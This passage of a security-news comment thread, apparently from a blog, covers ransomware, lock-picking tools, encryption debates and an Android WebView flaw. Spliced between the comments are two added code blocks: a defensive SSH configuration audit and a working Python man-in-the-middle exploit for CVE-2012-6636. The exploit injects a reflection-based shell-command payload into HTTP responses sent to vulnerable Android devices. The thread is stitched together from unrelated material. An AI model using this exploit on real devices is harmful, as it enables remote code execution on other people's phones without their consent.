    Nordic communications authorities have now, for the first time, given telecommunications companies a joint recommendation whose purpose is to prevent the potential abuse of SS7 signaling traffic.

    Source: http://www.uusiteknologia.fi/2016/01/15/kannykoiden-tietoturvaa-yhtenaistetaan/

  9. Tomi Engdahl says:

    Shoddy Ransomware Destroys User’s Files
    http://news.softpedia.com/news/shoddy-ransomware-destroys-the-user-s-files-498889.shtml

    A ransomware strain based on the open source Hidden Tear ransomware is infecting users, encrypting their files and losing the encryption key along the way, rendering all files unrecoverable.

    Last August, Turkish security researcher Utku Sen open-sourced on GitHub the code of a home-made ransomware he had created for educational purposes.

    This particular ransomware was named Hidden Tear, and according to its author’s blog post, it was a honeypot to fool ransomware authors into using his code instead of creating their own.

    The trick was that Hidden Tear contained a crypto flaw that would allow the researcher to decrypt files later on if someone ever used his code.

    According to Trend Micro’s security team, someone did, and those were the creators of the ransomware strain identified by the company as RANSOM_CRYPTEAR.B.

    Between September 15 and December 17, this group hijacked a website from Paraguay, and used it to redirect its users to a fake Adobe Flash look-a-like website that spread a booby-trapped Flash Player update.

    Users that downloaded this update would see the file launch into execution as soon as it finished downloading, and in a matter of minutes they would be infected with a crypto-ransomware that encrypted most of their data files.

    RANSOM_CRYPTEAR.B was losing the encryption key

    The bad part was that the ransomware’s authors somehow managed to muddle Hidden Tear’s code, and they were throwing away the encryption key, never sending it to their C&C servers.

    This shoddy behavior didn’t matter for the ransomware’s authors, who were more interested in receiving the Bitcoin payment (around $500) than in providing a safe way to decrypt encrypted files after the ransom was received.

    Destroying The Encryption of Hidden Tear Ransomware
    http://www.utkusen.com/blog/destroying-the-encryption-of-hidden-tear-ransomware.html

    Reply
  10. Tomi Engdahl says:

    It seems that Bitcoin is broken:

    Big Trouble for Bitcoin
    http://news.slashdot.org/story/16/01/15/1310214/big-trouble-for-bitcoin

    A blog post by ex-Bitcoin developer Mike Hearn has highlighted dysfunctional management right at the top of Bitcoin development. He says it is clear Bitcoin is on the verge of collapse, and lays out several compelling reasons why. Quoting: “What was meant to be a new, decentralized form of money that lacked ‘systemically important institutions’ and ‘too big to fail’ has become something even worse: a system completely controlled by just a handful of people. Worse still, the network is on the brink of technical collapse.”

    The resolution of the Bitcoin experiment
    https://medium.com/@octskyward/the-resolution-of-the-bitcoin-experiment-dabb30201f7#.3f9qnqoi6

    Reply
  11. Tomi Engdahl says:

    IBM buys fraud sniffing biz for real-time protection
    This will help in ‘dramatically lowering false positives’, says Big Blue
    http://www.theregister.co.uk/2016/01/15/ibm_slurps_up_fraud_detection_biz_for_realtime_protection/

    IBM has assimilated a German payment fraud prevention business, IRIS Analytics, a provider of a real-time fraud analytics engine using machine learning algorithms, for undisclosed terms.

    “By integrating IRIS Analytics with IBM’s counter fraud technology, we will help organisations more accurately detect fraud at scale and speed so they’re in a position to implement countermeasures quickly,” said Alistair Rennie, general manager of Industry Solutions at IBM, “while at the same time assisting with dramatically lowering false positives.”

    Banks typically detect fraud after the fact, and take on average four days to deploy counter-measures.

    “The combination of IRIS technology with IBM’s Counter Fraud capabilities creates a comprehensive solution for real time payment fraud prevention,”

    Reply
  12. Tomi Engdahl says:

    Kiwi hackers crack crap algo, showcase 40c-a-litre DIY fuel discounts
    Half price petrol? There’s an app for that.
    http://www.theregister.co.uk/2016/01/15/kiwi_hackers_crack_crap_algo_showcase_40caliter_diy_fuel_discounts/

    New Zealanders could print their own non-expiring 40c fuel discount vouchers thanks to a shoddy algorithm that a hacking duo has broken.

    The algorithm developed by Countdown affects petrol stations operated by national energy provider Z and is designed as an incentive for consumers who shop at various supermarkets.

    Countdown says it has developed a “technical solution” for barcode reuse, but it is unknown – and appears unlikely – if this shutters the flaw which allows new codes to be generated at will.

    The petrol station had earlier disabled manual barcode entry at pumps to stop codes being shared online, but the researchers say fixing the flaw will require the algorithm to be re-written.

    The two researchers, who requested anonymity, have generated the discount codes on a host of different platforms including an unpublished Android app, a barcode printer, and even on tee-shirts.

    In a demonstration at the Kiwicon security conference last month the pair demonstrated how with the click of a button their smart watch application would produce codes that could be scanned at the pump for discounts up to 40 cents a litre.

    The duo says they have not used the codes on pumps, and urged others to do similar since it would likely be regarded as theft, but say it is identical to the legitimate barcodes offered at retail shops.

    Manipulating the algorithm further such that the output is negative could result in a denial of service attack against the petrol pump computers.

    Reply
  13. Tomi Engdahl says:

    BlackBerry dismisses claims that Dutch police cracked its email encryption
    Says devices are as secure as they always have been
    http://www.theinquirer.net/inquirer/news/2441512/dutch-police-claim-to-have-cracked-blackberry-encryption

    CANADIAN PHONE MAKER BlackBerry has dismissed claims that Dutch police managed to ‘crack’ the encryption of emails and data stored on its devices.

    In a statement, the firm said: “If such an information recovery did happen, access to this information from a BlackBerry device could be due to factors unrelated to how the BlackBerry device was designed, such as user consent, an insecure third-party application, or deficient security behaviour of the user.”

    BlackBerry added that it remains focused on privacy and security, and affirmed that there are no backdoors in any of its devices.

    Reply
  14. Tomi Engdahl says:

    Server Hardening
    http://www.linuxjournal.com/content/server-hardening

    A truly comprehensive work on server hardening would be beyond the scope not only of a single article, but a single (very large) book, yet all is not lost. It is true that there can be no “one true hardening procedure” due to the many and varied environments, technologies and purposes to which those technologies are put, but it is also true that you can develop a methodology for governing those technologies and the processes that put the technology to use that can guide you toward a sane setup. You can boil down the essentials to a few principles that you then can apply across the board.

    I also should say that server hardening, in itself, is almost a useless endeavor if you are going to undercut yourself with lazy choices like passwords of “abc123” or lack a holistic approach to security in the environment. Insecure coding practices can mean that the one hole you open is gaping, and users e-mailing passwords can negate all your hard work. The human element is key, and that means fostering security consciousness at all steps of the process. Security that is bolted on instead of baked in will never be as complete or as easy to maintain, but when you don’t have executive support for organizational standards, bolting it on may be the best you can do. You can sleep well though knowing that at least the Linux server for which you are responsible is in fact properly if not exhaustively secured.

    The single most important principle of server hardening is this: minimize your attack surface. The reason is simple and intuitive: a smaller target is harder to hit. Applying this principle across all facets of the server is essential. This begins with installing only the specific packages and software that are exactly necessary for the business purpose of the server and the minimal set of management and maintenance packages. Everything present must be vetted and trusted and maintained. Every line of code that can be run is another potential exploit on your system, and what is not installed can not be used against you. Every distribution and service of which I am aware has an option for a minimal install, and this is always where you should begin.

    The second most important principle is like it: secure that which must be exposed. This likewise spans the environment from physical access to the hardware, to encrypting everything that you can everywhere—at rest on the disk, on the network and everywhere in between. For the physical location of the server, locks, biometrics, access logs—all the tools you can bring to bear to controlling and recording who gains physical access to your server are good things, because physical access, an accessible BIOS and a bootable USB drive are just one combination that can mean that your server might as well have grown legs and walked away with all your data on it. Rogue, hidden wireless SSIDs broadcast from a USB device can exist for some time before being stumbled upon.

    Within the parameters of this example scenario, there are levels of concern that differ depending on the purpose of the server, ranging from “this is a toy I’m playing with, and I don’t care what happens to it” all the way to “governments will topple and masses of people die if this information is leaked”, and although a different level of paranoia and effort needs to be applied in each case, the principles remain the same.

    Even if you don’t care what ultimately happens to the server, you still don’t want it joining a botnet and contributing to Internet Mayhem. If you don’t care, you are bad and you should feel bad.

    In any of these cases, the very first thing to do is tighten your network access. If the hosting provider provides a mechanism for this, like Amazon’s “Zones”, use it, but don’t stop there. Underneath securing what must be exposed is another principle: layers within layers containing hurdle after hurdle. Increase the effort required to reach the final destination, and you reduce the number that are willing and able to reach it. Zones, or network firewalls, can fail due to bugs, mistakes and who knows what factors that could come into play. Maximizing redundancy and backup systems in the case of failure is a good in itself. All of the most celebrated data thefts have happened when not just some but all of the advice contained in this article was ignored, and if only one hurdle had required some effort to surmount, it is likely that those responsible would have moved on to someone else with lower hanging fruit. Don’t be the lower hanging fruit. You don’t always have to outrun the bear.

    The first principle, that which is not present (installed or running) can not be used against you, requires that you ensure you’ve both closed down and turned off all unnecessary services and ports in all runlevels and made them inaccessible via your server’s firewall, in addition to whatever other firewalling you are doing on the network.

    Every distribution has its tools for managing a firewall

    Once you’ve dealt with updates, you can move on and continue to evaluate your server against the two security principles of 1) minimal attack surface and 2) secure everything that must be exposed. At this point, you are pretty solid on point one. On point two, there is more you can yet do.

    The concept of hurdles requires that you not allow root to log in remotely. Gaining root should be at least a two-part process.

    PermitRootLogin no

    For that matter, root should not be able to log in directly at all. The account should have no password and should be accessible only via sudo—another hurdle to clear.

    If a user doesn’t need to have remote login, don’t allow it, or better said, allow only users that you know need remote access.

    You can set a password policy on your server to require a complex password for any and all users, but I believe it is generally a better idea to bypass crackable passwords altogether and use key-only login, and have the key require a complex passphrase.

    Even with strong encryption in use, in the recent past, many flaws have been found in widely used programs and protocols—get used to turning ciphers on and off in both OpenSSH and OpenSSL.

    Get used to installing, using and tuning a few more security essentials, because these last few steps will make you exponentially more secure.

    The fact of the matter is that even though you’ve locked down your authentication, there still exists the chance, however small, that a configuration mistake or an update is changing/breaking your config, or by blind luck an attacker could find a way into your system, or even that the system came with a backdoor. There are a few things you can do that will further protect you from those risks.

    Speaking of backdoors, everything from phones to the firmware of hard drives has backdoors pre-installed.

    So suffice it to say, I personally do not trust anything sourced from the NSA, and I turn SELinux off because I’m a fan of warrants and the fourth amendment.

    In the spirit of turning off and blocking what isn’t needed, since most of the malicious traffic on the Internet comes from just a few sources, why do you need to give them a shot at cracking your servers? I run a short script that collects various blacklists of exploited servers in botnets, Chinese and Russian CIDR ranges and so on, and creates a blocklist from them, updating once a day.

    It’s possible you don’t want all these blocked. I usually leave tor exit nodes open to enable anonymity, or if you do business in China, you certainly can’t block every IP range coming from there.

    Although there are many more areas to be hardened, since according to principle three we assume all measures will be defeated, I will have to leave things like locking down cron and bash as well as automating standard security configurations across environments for another day.

    I want to conclude with one last must-use tool: Fail2ban.

    Fail2ban is available in virtually every distribution’s repositories now, and it has become my go-to. Not only is it an extensible Swiss-army knife of brute-force authentication prevention, it comes with an additional bevy of filters to detect other attempts to do bad things to your system. If you do nothing but install it, run it, keep it updated and turn on its filters for any services you run, especially SSH, you will be far better off than you were otherwise. As for me, I have other higher-level software like WordPress log to auth.log for filtering and banning of malefactors with Fail2ban.

    Reply
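    The SSH points in the article above (no remote root login, key-only authentication, no password logins) lend themselves to a quick configuration audit. The following is an added example, not code from the Linux Journal article or from this comment thread. It assumes a plain `Keyword value` sshd_config (the `Keyword=value` form is not handled), follows sshd's rule that the first uncommented occurrence of a keyword is the one that takes effect, and audits a constructed sample file with deliberately weak settings.

```sh
#!/bin/sh
# Added example (not from the Linux Journal article): audit an sshd_config
# against the hardening points made above. Sample config is constructed.

# effective_value FILE KEYWORD
# sshd uses the FIRST uncommented occurrence of a keyword, so that is the one
# an audit must look at; keyword matching is case-insensitive, as in sshd.
# Commented lines have "#Keyword" as their first field and never match.
effective_value() {
    awk -v k="$2" 'tolower($1) == tolower(k) { print $2; exit }' "$1"
}

# audit_sshd_config FILE
# Prints one line per finding: "KEYWORD expected WANT, found GOT".
# A missing keyword is reported as "(unset)": a hardening baseline should set
# these explicitly rather than rely on whatever the build's default happens
# to be. "PermitRootLogin no" is what the article asks for, so even
# "prohibit-password" is flagged here.
audit_sshd_config() {
    for pair in \
        "PermitRootLogin:no" \
        "PasswordAuthentication:no" \
        "PubkeyAuthentication:yes" \
        "PermitEmptyPasswords:no" \
        "X11Forwarding:no"
    do
        key=${pair%%:*}
        want=${pair#*:}
        got=$(effective_value "$1" "$key")
        [ -z "$got" ] && got="(unset)"
        if [ "$got" != "$want" ]; then
            printf '%s expected %s, found %s\n' "$key" "$want" "$got"
        fi
    done
    return 0
}

# count_findings FILE: number of findings as a plain integer on stdout
count_findings() {
    audit_sshd_config "$1" | wc -l | tr -d ' '
}

# write_sample_config FILE: constructed sshd_config with weak settings. It
# includes a commented-out line that must NOT count as set, and a duplicated
# keyword whose second value sshd would ignore (first occurrence wins).
write_sample_config() {
    cat > "$1" <<'EOF'
# constructed sample - deliberately weak
Port 22
PermitRootLogin yes
PermitRootLogin no
#PasswordAuthentication no
PasswordAuthentication yes
PubkeyAuthentication yes
X11Forwarding yes
EOF
}

# Stand-alone run: audit the constructed sample and show the findings
# (four lines: PermitRootLogin, PasswordAuthentication, PermitEmptyPasswords
# and X11Forwarding).
demo_file=$(mktemp)
write_sample_config "$demo_file"
audit_sshd_config "$demo_file"
rm -f "$demo_file"
```

    Run it against a real file with `audit_sshd_config /etc/ssh/sshd_config`; an empty result means every checked keyword is set explicitly to the hardened value. The first-occurrence rule matters in practice: a hardened `PermitRootLogin no` appended at the end of a file that already contains `PermitRootLogin yes` higher up changes nothing, and an audit that took the last value would report the host as fixed when it is not.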
  15. Tomi Engdahl says:

    Patrick Tucker / Defense One:
    Hacking collective Ghost Security Group says ISIS created its own encrypted messaging app

    ISIS Has Built A Secure Messaging App
    http://www.defenseone.com/technology/2016/01/isis-now-has-new-secure-messaging-app/125062/

    Facebook and other big tech companies aren’t the only ones who can create apps for encrypted communication.

    ISIS has a new Android app for exchanging secure messages, joining another app that distributes propaganda and recruiting material, according to a counterterrorism network called the Ghost Security Group.

    Last month, Ghost Security and others observed ISIS members using private messages on the Telegram app and direct messages on Twitter to send followers to a site (since vanished) to download the Amaq Agency app.

    “The application’s primary purpose is for propaganda distribution. Using the app you are able to follow the most recent news and video clips,” Ghost Security representatives told Defense One. The Amaq Agency has known ties to Islamic State and issued statements in support of the attackers in the recent California shootings before all the details were publicly available.

    The app joins ISIS’ other known methods of communication to individuals and groups. Among their favorite is Telegram, a messaging app created by Pavel Durov, a Russian entrepreneur residing in Germany.

    Immediately after the Paris attacks in November, credited to ISIS-affiliated gunmen, Telegram suspended 78 public ISIS-related channels in 12 languages. But Durov has made no promises that private chats could be shut down.

    Here’s what today’s announcement from Ghost Security means if it’s true: even if FBI Director James Comey and others get their wish and providers of end-to-end encrypted communication are forced to put in back doors into their services or face banning, then ISIS would still have the ability to communicate securely, just not as securely as if they were using a service like Telegram or WhatsApp … at least not yet.

    Reply
  16. Tomi Engdahl says:

    Kevin Roose / Fusion:
    Profile of ComplaintsBureau.com owner Scott Breitenstein, who decided to ban revenge porn on his site after interviews for this piece

    At Home with a Revenge Porn Mogul
    http://fusion.net/video/252712/complaints-bureau-revenge-porn-mogul/

    Scott Breitenstein has been called an “internet terrorist,” “the worst man on the internet,” and worse. His work has left behind an Everest-size pile of broken relationships, destroyed reputations, and ruined lives. He’s been targeted by lawsuits, court orders, vigilante hacker groups, and the Department of Homeland Security, all for his role in one of the internet’s darkest trades: hosting “revenge porn,” nude photos and videos posted online non-consensually, often by disgruntled exes.

    Breitenstein, 45, is the owner of ComplaintsBureau.com, a site that hosts user-submitted grievances of all types. He first encountered the site in 2005, after getting ripped off while trying to buy a flat-screen TV from an e-commerce site. Searching for other people who had been scammed by the same site, he found ComplaintsBureau, where he posted a negative review of the business. A week later, under mysterious circumstances, the TV seller’s site went offline.

    “I thought that was cool,”

    Breitenstein never got his money back, but he did acquire a taste for digital vengeance. He emailed the owner of ComplaintsBureau and asked if he’d be willing to sell the site. The owner agreed.

    Breitenstein’s ComplaintsBureau was a bare-bones site, but it had something the Better Business Bureau didn’t have: excellent search engine optimization, which often placed ComplaintsBureau’s posts on the first page of Google results for a given business.

    Customers searching for that business’s website would find a ComplaintsBureau post instead, and would often be scared off before their first purchase.

    “I liked it because it could put the bad guy out of business,” Breitenstein said. “Everybody saw how powerful it was.”

    Their complaints were largely unverifiable, frequently profane and often personal, singling out individual employees by name. Unlike sites like TripAdvisor or Yelp, Breitenstein didn’t allow business owners to respond to the complaints made against them, even if they were false or defamatory.

    These complaints carried real weight

    Predictably, businesses hated ComplaintsBureau

    Several years ago, ComplaintsBureau received a more lurid kind of complaint: a user posted nude photos to the site, of someone the user said was his cheating ex-girlfriend.

    Breitenstein, who operated a small fleet of scummy websites in addition to ComplaintsBureau, was no stranger to cheating allegations. Among his sites were ReportMyEx.com and CheatersRUs.com—both sites where jilted lovers could go to name and shame their exes.

    But those sites allowed only text complaints. Photos were a different thing altogether. And days after the revenge porn post went up on ComplaintsBureau, he noticed that the traffic to the post was dwarfing everything else on the site.

    In the past several years, dozens of states have passed laws making it illegal to post revenge porn. But hosting a revenge porn website is still technically legal, thanks to Section 230 of the Communications Decency Act of 1996, which shields websites from liability for content published by their users. (It’s the same law that protects Facebook from being sued when one of its users posts something obscene or copyrighted.)

    Still, the revenge porn business has gotten harder in recent years, thanks to the work of advocacy groups and the support of large tech companies.

    For Breitenstein, the potential reward of distributing revenge porn was worth the risks.

    Breitenstein also devised a dastardly strategy to extract more money from revenge porn victims. Often, victims who appeared on the site would file copyright claims for their nude photos under the Digital Millennium Copyright Act, hoping to get them taken down. Breitenstein told these victims that if these DMCA takedown notices weren’t followed by the rest of the DMCA complaint process—a lengthy endeavor that can involve registering a work with the U.S. Copyright Office and providing voluminous information about the photos being claimed—he would sue them for $10,900 in “defamation” costs.

    As brazen as the practice of penalizing revenge porn victims for defaming him was, it worked; Breitenstein collected tens of thousands of dollars in settlements from terrified women, who were scared that he would report them to a collection agency if they failed to pay.

    With this revenue model in place, Breitenstein was no longer just a crank with a complaints site. From his home in Dayton, he had become a revenge porn mogul—a successful bottom-feeder in the digital economy.

    Reply
  17. Tomi Engdahl says:

    Inside BlackBerry:
    BlackBerry dismisses claim that Netherlands Forensic Institute cracked its device encryption, suggesting user error or third-party apps may be involved

    BlackBerry Devices: Secure As They Have Always Been
    http://blogs.blackberry.com/2016/01/blackberry-devices-secure-as-they-have-always-been/

    Reply
  18. Tomi Engdahl says:

    Researcher Bypasses Apple’s Updated Malware Protection in ’5 Minutes’
    http://motherboard.vice.com/read/researcher-bypasses-apples-updated-malware-protection-in-5-minutes

    Apple’s Mac computers have long been considered safer than their Windows-powered counterparts—so much so that the common belief for a long time was that they couldn’t get viruses or malware. Even Apple adopted that cliche for marketing purposes.

    The reality, however, is slightly different. Trojans have targeted Mac computers for years, and things don’t seem to be improving. In fact, cybercriminals created more malware targeting Macs in 2015 than in the past five years combined, according to one study. Since 2012, Apple has tried to protect users with Gatekeeper, a feature designed to block common threats such as fake antivirus products, infected torrent files, and fake Flash installers—all malicious software that Mac users might download while regularly browsing the internet.

    But it looks like Gatekeeper’s walls aren’t as strong as they should be.

    As it is designed now, Gatekeeper checks apps downloaded from the internet to see if they are digitally signed by either Apple or a developer recognized by Apple. If so, Gatekeeper lets the app run on the machine. If not, Gatekeeper prevents the user from installing and executing the app.

    In September, Wardle showed how it was possible to piggyback on a legitimate app signed by Apple to trick a Mac to run another malicious application or binary—with no valid signature—wrapped inside the legitimate one, effectively bypassing Gatekeeper.

    “[The] patch they released was incredibly weak,” Wardle told Motherboard. “It literally took me five minutes to completely bypass.”

    Reply
  19. Tomi Engdahl says:

    More people died taking selfies in India last year than anywhere else in the world
    https://www.washingtonpost.com/news/worldviews/wp/2016/01/14/more-people-die-taking-selfies-in-india-than-anywhere-else-in-the-world/

    India may have a selfie-loving prime minister, Narendra Modi, but Indians in general seem to be bad at selfie safety.

    Of at least 27 “selfie related” deaths around the world last year, about half occurred in India, reports show.

    Last year, no-selfie zones were also established in certain areas

    Reply
  20. Tomi Engdahl says:

    Casino Sues Security Firm For Failing To Contain Malware Infection
    http://it.slashdot.org/story/16/01/17/1321230/casino-sues-security-firm-for-failing-to-contain-malware-infection

    US casino chain Affinity Games is suing Trustwave Holdings, a cyber-security vendor that was brought in to investigate a card breach but failed to detect and stop a malware incident on Affinity’s servers, which led to the escalation of a previous card breach. The casino chain noticed the sloppy job a few months later when it hired a penetration testing company to comply with new gaming regulation.

    Casino Sues Security Firm for Failing to Contain Malware Infection
    http://news.softpedia.com/news/casino-sues-security-firm-for-failing-to-contain-malware-infection-499010.shtml

    US casino chain Affinity Games is suing Trustwave Holdings, a cyber-security vendor that was brought in to investigate a card breach but failed to detect and stop a malware incident on Affinity’s servers, which led to the escalation of a previous card breach.

    The whole story starts towards the end of October 2013 when Affinity Games was contacted by law enforcement and notified of fraudulent credit card activity on the bank accounts of numerous victims.

    All those people had Affinity’s gambling service in common, so following this revelation, the casino’s staff started an investigation and on October 24, 2013, concluded that it was the victim of a malware intrusion that allowed a third-party to exfiltrate credit card data from some of its computers.

    Trustwave was hired to investigate and stop a credit card breach

    Affinity hired Trustwave to examine the incident, probe for details and contain the malware threat. In a report submitted at the end of the investigation, on January 13, 2014, Trustwave reassured the casino chain that the incident “has been contained” and that a “backdoor component appears to exist within the code base, but appears to be inert.”

    Trustwave also said that the malware’s author became aware that he was detected, and stopped all activity on October 16, 2013, also removing and deactivating some of the malware’s components.

    Life went on as usual until new rules in the gaming industry forced Affinity casinos to upgrade their servers and carry out a series of penetration tests to comply with new regulation.

    Mandiant was brought in to mop up Trustwave’s mess

    According to Mandiant’s report, the original card breach that occurred between March and October 2013, returned to life without being noticed during Trustwave’s investigation, on December 6, 2013, and continued until April 27, 2014, when Mandiant security experts shut it down.

    Affinity says that Trustwave failed to remove the malware it discovered, failed to find all pieces of the malware, and also failed to identify evidence in some logs it looked at.

    Affinity: Trustwave performed a woefully inadequate investigation

    “Trustwave willfully disregarded further evidence that the breach was likely more widespread than what the firm found through its review of the limited systems it examined,” the lawsuit reads. “Trustwave willfully disregarded other evidence that the breach was more widespread than first believed.”

    Affinity is looking for damages in excess of $100,000 / €92,000.

    Reply
  21. Tomi Engdahl says:

    KeysForge will give you printable key blueprints using a photo of a lock
    Smartphone photo of lock keyways enough to produce ready-to-print CAD drawings
    http://www.theregister.co.uk/2016/01/18/keysforge_will_give_you_printable_key_blueprints_using_a_photo_of_a_lock/

    Hackers have been gifted with an online web service that can produce blueprints for 3D printed keys from nothing more than a photograph of a lock.

    The KeysForge application developed by an academic trio drastically simplifies the complexities in developing keys, allowing amateurs to snap a photo of a lock and have the respective key 3D printed.

    University of Colorado infosec assistant professor Eric Wustrow and two colleagues revealed the work at the Chaos Communications Congress in Hamburg last month.

    “We made an automatically generating 3D model program [which] takes a single picture of the keyway (lock) and produces a model in CAS (computer assisted design),” Wustrow says, adding that a smartphone photo will suffice.

    “You can then take that model and print it on a 3D printer or ship it off to Shapeways or whatever.”

    keysforge
    https://keysforge.com/

    This website demonstrates a tool that generates a CAD model of a key blank from a single picture of a lock. This model can then be 3D printed cheaply in either plastic or metal from a number of services.

    Such a tool can be used to get around restricted keyways, a defense currently employed by locksmiths and designers to prevent a wide range of attacks including bumping, impressioning, privilege escalation, and teleduplication.

    What is this?

    This is a tool that can produce a 3D printable CAD model of a key blank (or with cuts if provided) from a single picture of the lock face.

    Why publish this tool?

    While it is possible that this website will aid attackers, we believe there is greater benefit in demonstrating to both lock designers and the public just how inexpensive these attacks are with modern tools. In addition, allowing a larger audience to use the tool may help defenders discover particular features of keyways that make them difficult to produce with this method, further assisting lock designers that want to defend against this technology.

    What attacks are enabled by 3D printing?

    3D printed keys can be used to enable privilege escalation attacks, where an attacker with access to a low-level change key can cheaply derive the master key for a system. This attack requires access to key blanks, which are difficult to obtain for restricted keyways.

    In addition, 3D printing can provide easier access to bump keys and can allow restricted keyway keys to be copied, either with direct access to the original key or by taking pictures of them remotely.

    What can we do to defend against 3D printed keys?

    Electronic locks or other non-mechanical locks (such as magnetic locks like EVVA MCS) may defend against attacks enabled by 3D printed keys, although they may have their own weaknesses. For example, electronic locks may be vulnerable to man-in-the-middle or remote code execution attacks.

    What if the tool doesn’t work on my image?

    The tool attempts to infer the keyway outline automatically, however, sometimes it does this incorrectly.

    Reply
  22. Tomi Engdahl says:

    Autopwn every Android < 4.2 device on your network using BetterCap and the "addJavascriptInterface" vulnerability.
    http://www.evilsocket.net/2016/01/18/autopwn-every-android-device-on-your-network-using-bettercap-the-and-addjavascriptinterface-vulnerability/

    Recently I've been playing with Android's WebView based vulnerabilities, focusing on how to exploit them using a MITM attack.
    One of the most interesting ones is the addJavascriptInterface vulnerability ( CVE-2012-6636 ) which affects every device running a version older than Android 4.2.

    There's an excellent post about this vulnerability, long story short, if there's an app which is using a WebView UI control and it's declaring a custom javascript interface for it like so

    you can inject some special javascript into that page and make that device execute any shell command you want.

    In this post, I'd like to show how easy it is to automatically exploit every vulnerable device on your network using bettercap and for this purpose I've written the AndroidPwn transparent proxy module.

    WebView addJavascriptInterface Remote Code Execution
    https://labs.mwrinfosecurity.com/blog/2013/09/24/webview-addjavascriptinterface-remote-code-execution/

    Lately we have been analysing mobile advertising networks and in particular the Software Development Kit (SDK) that the networks make available to application developers for the purpose of monetising their applications. During this research we have found that a lot of applications expose mobile device users to the threat of compromise. We have found a number of exploitable (cross platform) vulnerabilities and expect to find more as research continues. We are in the early stages of the research and we will be conducting further research in this area; however we have decided to release this advisory now as to help Android users take appropriate actions to protect themselves.

    Many advertising networks make an SDK available to application developers to ‘ease’ integration. The SDK contains header files and a static library.

    The advertising networks require the application to display content within a WebKit WebView. WebKit is an open source web browser engine that powers browsers such as Google Chrome, Apple Safari, the default iOS and Android browsers etc. WebView is the core view class in the WebKit framework.

    Many free apps use a WebView to load HTML content as an in-process web browser and the advertising network SDK uses the browser instance to facilitate advertisement loading from remote advertiser networks. These advertisements are loaded over a clear text channel (HTTP) and are susceptible to Man in the Middle (MitM) attacks. An attacker able to MitM the communications with the advertising network can inject arbitrary JavaScript into the WebView.

    Advertising networks gather metrics so that they can tailor campaigns and target specific ‘audiences’. Advertisers pay a lot of money for accurate metrics and/or successful delivery of targeted advertisements. Advertising networks also want to leverage the mobile device platform to deliver ‘rich media’ advertisements. To achieve their goals, access to the platform's or device's native capabilities is often required. This is realised by implementing a “native bridge”. It is possible to call ‘native’ code from a rendered WebView by using JavaScript. This is achieved on the Android platform in two different ways

    The WebView JavaScript bridge can be abused to execute arbitrary Java code, by using reflection to acquire a reference to a runtime object via the interface implemented in the Java code above.

    The issue has been disclosed publicly in an article authored by ‘Neil’ titled Abusing WebView JavaScript Bridges on December the 21st, 2012

    At this point, the attacker is able to perform a number of attacks against the device using drozer. The lowest impact attack would be downloading contents of the SD card and the exploited application’s data directory. However, depending on the device that was exploited this could extend to obtaining root privileges, retrieving other sensitive user data from the device or causing the user monetary loss.

    Reply
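    The injection step the post above describes (a transparent proxy rewriting clear-text HTTP responses so that a vulnerable WebView executes attacker JavaScript), written out as an added example. This is not the bettercap AndroidPwn module and not code from the post: it assumes a bridge object named `jsinterface` (the real name is whatever the vulnerable app passed to addJavascriptInterface, so this one is hypothetical) and runs on a constructed, uncompressed HTTP/1.1 ad response. Compressed or chunked responses are passed through untouched, since a real proxy would have to decode them before rewriting.

```python
import json

# Assumed bridge name: the real one is whatever the vulnerable app passed to
# addJavascriptInterface(obj, "...") (hypothetical here).
BRIDGE_NAME = "jsinterface"

# Constructed sample: an uncompressed HTML ad response as the proxy would see it.
SAMPLE_RESPONSE = (
    b"HTTP/1.1 200 OK\r\n"
    b"Content-Type: text/html; charset=utf-8\r\n"
    b"Content-Length: 43\r\n"
    b"\r\n"
    b"<html><body><p>ad content</p></body></html>"
)


def build_payload(bridge_name: str, command: str) -> str:
    """Return a <script> that reaches Runtime.exec() through the JS bridge.

    On Android < 4.2 every public method of the bridged Java object is
    callable from JavaScript, including Object.getClass(); from there
    reflection walks Class.forName("java.lang.Runtime") ->
    getMethod("getRuntime").invoke(null) -> Runtime.exec(String[]).
    """
    argv = json.dumps(["/system/bin/sh", "-c", command])  # valid JS array literal
    return (
        "<script>"
        f"{bridge_name}.getClass().forName('java.lang.Runtime')"
        ".getMethod('getRuntime',null).invoke(null,null)"
        f".exec({argv});"
        "</script>"
    )


def inject(raw: bytes, script: str) -> bytes:
    """Insert `script` before </body> of a plain HTTP/1.x HTML response.

    Content-Length is recomputed so the client does not truncate the body.
    Non-HTML, compressed or chunked responses are returned unchanged: a real
    proxy would have to decode those before it could rewrite them.
    """
    head, sep, body = raw.partition(b"\r\n\r\n")
    if not sep:
        return raw  # not a complete header block
    lines = head.decode("latin-1").split("\r\n")
    hdr = {}
    for line in lines[1:]:  # lines[0] is the status line
        name, _, value = line.partition(":")
        hdr[name.strip().lower()] = value.strip().lower()
    if "text/html" not in hdr.get("content-type", ""):
        return raw
    if "content-encoding" in hdr or "chunked" in hdr.get("transfer-encoding", ""):
        return raw

    payload = script.encode("utf-8")
    idx = body.lower().rfind(b"</body>")
    new_body = (body[:idx] + payload + body[idx:]) if idx != -1 else body + payload

    new_lines = []
    for line in lines:
        if line.lower().startswith("content-length:"):
            line = f"Content-Length: {len(new_body)}"
        new_lines.append(line)
    return "\r\n".join(new_lines).encode("latin-1") + b"\r\n\r\n" + new_body


if __name__ == "__main__":
    rewritten = inject(SAMPLE_RESPONSE, build_payload(BRIDGE_NAME, "id > /sdcard/pwned"))
    print(rewritten.decode("latin-1"))
```

    The reflection chain in the payload is the public CVE-2012-6636 technique. The fix on the app side is to target API 17 (Android 4.2) or later, where only methods annotated with @JavascriptInterface are reachable from JavaScript; on a device older than 4.2 the annotation is not enforced, so loading the ad content over HTTPS, which removes the injection point altogether, is the only defence that covers every device.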
  23. Tomi Engdahl says:

    Ex-NSA boss says FBI director is wrong on encryption
    http://money.cnn.com/2016/01/13/technology/nsa-michael-hayden-encryption/index.html

    The FBI director wants the keys to your private conversations on your smartphone to keep terrorists from plotting secret attacks.

    But on Tuesday, the former head of the U.S. National Security Agency — the supreme experts on communications — said that would be a terrible idea.

    General Michael Hayden, now retired, was speaking at a cybersecurity conference in Miami Beach. He expressed his unwavering support for encryption, a feature that protects voice calls or texts by turning data into nonsensical, indecipherable code.

    “I disagree with [FBI director] Jim Comey,” Hayden said in a speech. “I actually think end-to-end encryption is good for America.”

    At issue here is whether companies like Apple (AAPL, Tech30) and Google (GOOGL, Tech30) should offer encryption to customers. It safeguards their devices from anyone trying to break in, whether it’s criminal hackers or snooping federal agents.

    The Obama administration, initially irked by the challenge posed to surveillance, has dropped any plans to push for laws that bar or limit encryption.

